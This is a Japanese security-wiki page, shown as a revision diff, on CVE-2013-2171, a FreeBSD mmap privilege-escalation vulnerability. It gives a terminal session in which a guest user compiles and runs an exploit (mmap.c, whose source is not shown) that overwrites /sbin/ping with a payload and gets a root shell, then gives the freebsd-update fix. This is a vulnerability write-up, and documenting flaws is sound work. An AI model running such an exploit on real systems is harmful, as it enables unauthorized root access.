「CVE-2013-2171 FreeBSD mmapによる権限昇格の脆弱性」の版間の差分
提供: セキュリティ
(ページの作成:「<!-- vim: filetype=mediawiki --> CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。 __TOC__ == 概要 == CVE-20...」) |
細 |
||
| 行23: | 行23: | ||
Mon Apr 29 18:11:52 UTC 2013 | Mon Apr 29 18:11:52 UTC 2013 | ||
root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 | root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 | ||
| − | |||
vm% id | vm% id | ||
uid=1008(guest) gid=1001(users) groups=1001(users) | uid=1008(guest) gid=1001(users) groups=1001(users) | ||
2013年7月5日 (金) 00:36時点における版
CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。
概要
CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。
FreeBSD 9.0+ 以上に影響があります。 FreeBSD 9.0R, FreeBSD 9.1R で試しました。
使い方
権限昇格の例は、以下の通りです。
vm% uname -a FreeBSD vm2.local 9.1-RELEASE-p3 FreeBSD 9.1-RELEASE-p3 #0: Mon Apr 29 18:11:52 UTC 2013 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 vm% id uid=1008(guest) gid=1001(users) groups=1001(users) vm% gcc mmap.c vm% ./a.out [+] Saved old '/sbin/ping' [+] Using mmap-ed area at 0x281a4000 [+] Attached to 58383 [+] Copied 4917 bytes of payload to '/sbin/ping' [+] Triggering payload # id uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)
対処方法
freebsd-update で更新します。
% sudo freebsd-update fetch % sudo freebsd-update install